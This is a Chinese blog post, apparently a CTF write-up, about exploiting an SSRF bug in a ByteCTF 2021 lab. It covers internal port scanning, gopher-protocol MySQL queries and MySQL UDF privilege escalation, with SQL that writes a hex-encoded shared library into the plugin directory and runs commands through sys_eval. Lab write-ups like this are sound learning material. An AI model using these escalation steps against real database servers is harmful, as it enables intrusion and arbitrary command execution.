记一次SSRF练习

最新推荐文章于 2024-06-04 00:20:32 发布
最新推荐文章于 2024-06-04 00:20:32 发布
阅读量4.2k 收藏 3
点赞数 3
分类专栏: CTF 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38963246/article/details/122154717
版权

记一次SSRF练习


老表发我一个SSRF的CTF题,感觉还不错,还能练习下SSRF挖掘技巧,权作学习记录。

审题

环境搭建:

git clone https://github.com/sqlsec/ByteCTF2021-Final-SEO.git
cd ByteCTF2021-Final-SEO/Dockerfile
docker-compose up -d

docker搭建好基本上就是一个seo站长工具界面,撸了一遍接口发现如下接口存在漏洞。

image-20211219225804012

做题

image-20211219225930395

到这基本上就确定SSRF点了,不过这个是我测试方法,一般情况下还要测试下外网域名是否能够访问。

从info.php确定主机内网IP:172.73.23.21,之后就可以进行内网扫描。这个站点还有一个文件下载,能够造成任意文件读取,很有必要的,查看内网的一些信息(proc/net/arp)。

image-20211219230814303

这个还是比较好的一个点,如果有该主机的话就会有mac地址信息。之后用dict进行端口扫描,发现3306端口。

查看info.php可知使用了gopher协议,直接使用工具生成查询语句测试,注意二次URL编码。

image-20211219231732614

image-20211219231932272

后续进行UDF提权,几个命令如下:

#查看主机版本及架构
show variables like '%compile%';
#查看 plugin 目录(/usr/lib/mysql/plugin/)
show variables like 'plugin%';              
SELECT 0x7f454c460201010000000.......00000 INTO DUMPFILE '/usr/lib/mysql/udf.so';
#创建函数
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';         
select sys_eval('cat /flag');

交卷

image-20211221121112016

经验总结

1.UDF提权过程中,系统环境可能不同,数据库版本可能不同,需要注意。

2.dll,so文件获取可以在kali的路径/usr/share/metasploit-framework/data/exploits/mysql/下获取。

3.gopherus在使用过程中要注意,不同的系统窗口复制粘贴可能大小限制,数据过长可以直接修改gopherus,避免row_input传参。

4.插入数据过程中有限制的话可以使用如下语句拼接:

create table temp(data longblob);
insert into temp(data) values (0x4d5a9000......);
update temp set data = concat(data,0x33c2e......);
select data from temp into dumpfile '/usr/lib/mysql/plugin/udf.so';

5.udf提权只能创建so库里有的函数,不能随意命名,可以使用objdump -tT lib_mysqludf_sys_64.so查看。

痴人说梦梦中人
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
第一节 SSRF原理介绍-01
09-15
SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: SSRF漏洞定义是指...
一次BIGIP Configuration Utility渗透.pdf
04-22
本文档主要介绍了一次针对F5 BIG-IP设备中的Configuration Utility进行的安全渗透测试过程。测试过程中发现了两个已知的高危漏洞CVE-2020-5902与CVE-2021-22986,并尝试利用这些漏洞进行进一步的攻击活动。 #### 二...
SSRF的详解、复现与CTF下的SSRF
sGanYu
12-11 6460
借鉴于教父爱分享 SSRF 由攻击者构造,服务器端发起请求的安全漏洞,漏洞属于信息泄露的一种。 一般情况下,SSRF的攻击目标大多是网站的内部系统(正因为请求是由服务器端发起的,所以服务器能请求到与自身相连而与外网隔离的内部系统),只要当前服务器有向其他服务器发送请求的地方都可能存在SSRF漏洞。 SSRF形成的原因 大多数都是由服务端提供了从其他服务器应用获取数据的操作,且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片文档等等 举个例子:假设现在有两个网站
ByteCTF 2021(Crypto部分)
m0_57291352的博客
10-24 724
easyxor 核心加密算法convert就是四个shift,写个逆就行,flag被分为两部分,前半部分用OFB模式加密,后半部分用CBC模式加密,由于CBC模式的缺陷,当我们只考虑最后一块时,将倒数第二块作为iv,凭借flag的格式做判断即可爆破出key,再利用OFB模式的漏洞,结合key与已知的flag格式即可逆推出iv,此时iv和key尽知,直接解密即可 from Crypto.Util.number import bytes_to_long, long_to_bytes from random im
SSRF及相关例题
最新发布
2302_80044238的博客
06-04 736
服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。
2021ByteCTF题目及附件
NNanfeng
10-18 799
需要的师傅自行下载哦,点个赞吧 hi,这是我用百度网盘分享的内容~复制这段内容打开「百度网盘」APP即可获取  链接:https://pan.baidu.com/s/1CqvAZ9TP93QSqX8aKg4A2Q  提取码:xgk4
SSRF原理及攻防解析(简单明了)
qq_41565526的博客
04-04 2427
原理解析 服务端请求伪造(SSRF)是指一种由攻击者构造形成由服务端发起请求的一个安全漏洞,一般情况下,SSRF攻击的目标都是从外网无法访问的内部系统,借助服务端发起伪造的请求,可以访问到与它相连而与外网隔离的内部系统。 之所以会形成SSRF主要是因为服务器提供了从其他服务器应用获取数据的功能,但是没有对目标服务器做过滤和限制。比如从指定URL地址获取数据(引入css/js等数据时)。假设如下的一...
攻防世界-MISC-练习区12题解
TY_JUST的博客
04-30 3006
攻防世界-MISC-新手区 一、this_is_flag 题目描述: Most flags are in the form flag{xxx}, for example:flag{th1s_!s_a_d4m0_4la9} 解题过程: 得到flag th1s_!s_a_d4m0_4la9 二、pdf 题目描述: 菜猫给了菜狗一张图,说图下面什么都没有 解题过程: 得到一个pdf,描述中说图下面什么都没有,使用在线工具将pdf转出word文档:https://app.xunjiepdf.com/
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
以点到面的SSRF漏洞入门学习+安鸾渗透测试靶场SSRF系列题目练习 SSRF01 SSRF02 SSRF03
AAAAAAAAAAAA66的博客
02-03 1906
目录 认识 SSRF(服务器伪造) 实例 安鸾SSRF01 有时间的话可以先看看这里 前言:其实我很早就了解到了'SSRF' (服务器伪造)这个名词了,但是当时仅从字面上感觉非常难理解,看了下详细的描述也没有什么头绪,再加上没有碰到什么靶场或者CTF题目有把这个作为单独的考点,到了最后可能就放弃了对SSRF的学习。 所以这里最好从一些简单的靶场练习,帮助我们建立一点印象,再以点到面的学习,然后逐渐的掌握各种相关应用场景。大家耐心的看一遍话基本能简单的入门SSRF了。 这是我一个新手的一.
攻防世界题目练习--MISC新手关(1~6)
qq_40490088的博客
10-19 6419
练习地址:https://adworld.xctf.org.cn/ 题目1:this_is_flag 题目描述:Most flags are in the form flag{xxx}, for example:flag{th1s_!s_a_d4m0_4la9} 解决: 只需要把example里的内容复制进去就可以。 题目2:ext3 题目描述:今天是菜狗的生日,他收到了一个li...
攻防世界-MISC-新手题解
weixin_43486981的博客
08-25 9036
文章目录PDFgive_you_flag坚持60sGIF掀桌子如来十三掌steganoSimpleRAR PDF 题目描述:菜猫给了菜狗一张图,说图下面什么都没有 附件下载下来是一个pdf图片 很明显是图片隐藏,根据提示应该图片下有什么东西 把pdf放到linux中,用鼠标选中图片部分,会发现隐藏的信息显示出来了 give_you_flag 题目描述:菜狗找到了文件中的彩蛋很开心,给菜猫发了个表情包 附件是一个gif动图,点开发现某一帧好像有个二维码 使用stegsolve分析该gif(stegsolv
攻防世界—MISC 新手区1-12
m0_62063669的博客
07-09 849
1.this_is_flag2.pdf3.如来十三掌4.give_you_flag5.stegano6.坚持60s7.gif8.掀桌子9.ext310.SimpleRAR11.base64stego12.功夫再高也怕菜刀 题目描述:菜猫给了菜狗一张图,说图下面什么都没有下载附件,是一个pdf文件,里面有一张图片,鼠标移动,发现眼睛位置附近出现 文字输入光标,全部选中复制出来就是flag flag{security_through_obscurity}题目描述:菜狗为了打败菜猫,学了一套如来十三掌。下..
ssrf原理及ctfshow例题
2301_80499103的博客
05-28 775
1.ssrf的原理SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统。也就是说可以利用一个网络请求的服务,当作跳板进行攻击。攻击者利用了可访问Web服务器(A)的特定功能 构造恶意payload;
SSRF学习 2
weixin_63231007的博客
05-21 867
[CTFHub]ssrf 上传文件&Fastcgi&Redis&bypass
ByteCTF2021安全范儿高校挑战赛线上Misc-《HearingNotBelieving》
Mark的博客
10-19 3532
刚拿到文件便发现是一段音频,直接丢进Audacity 频率改一下窗口大小再放大(便不会模糊) 前面的是频谱图中有二维码,截图后手拼下得到前半段flag拼接完成我这加了个滤镜才扫出来了 得到第一部分的flag 第二部分的flag需要通过音频转图片的方式得出,这里用到了Robot36这个手机软件(没有软件的可以私聊发给你),在手机上打开软件,然后通过电脑外发音频,手机麦克风接受音频然后得到图片,最后进行拼图 类似这种图很多张 最后ps或ppt进行拼图得到 加个滤镜就可以扫出来 处理下扫描得到后半段
ssrf redis
08-29
SSRF (Server Side Request Forgery) 是一种攻击方式,通过欺骗服务器发起伪造的请求来访问受信任的内部资源。Redis 是一种流行的开源内存数据库。 如果你想通过 SSRF 进行 Redis 的攻击,可能的方式包括: 1. 访问 Redis 未授权的端口:Redis 默认监听在 6379 端口,如果你能够通过 SSRF 访问到该端口,并且 Redis 没有进行适当的身份验证和授权配置,那么你可能能够执行一些恶意操作,如读取或修改 Redis 中的数据。 2. 利用 Redis 的特殊功能:Redis 提供了一些特殊功能和命令,如远程代码执行、文件系统访问等。如果你能够通过 SSRF 发起有效的 Redis 命令,可能会导致服务器执行恶意操作。 需要注意的是,SSRF 攻击是一项严重的安全问题,可以导致数据泄漏、远程代码执行等风险。为了保护系统安全,建议在开发和部署过程中采取适当的安全措施,如限制服务器对内部资源的访问、使用防火墙、进行身份验证和授权等。同时,定期更新和修补软件漏洞也是很重要的。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值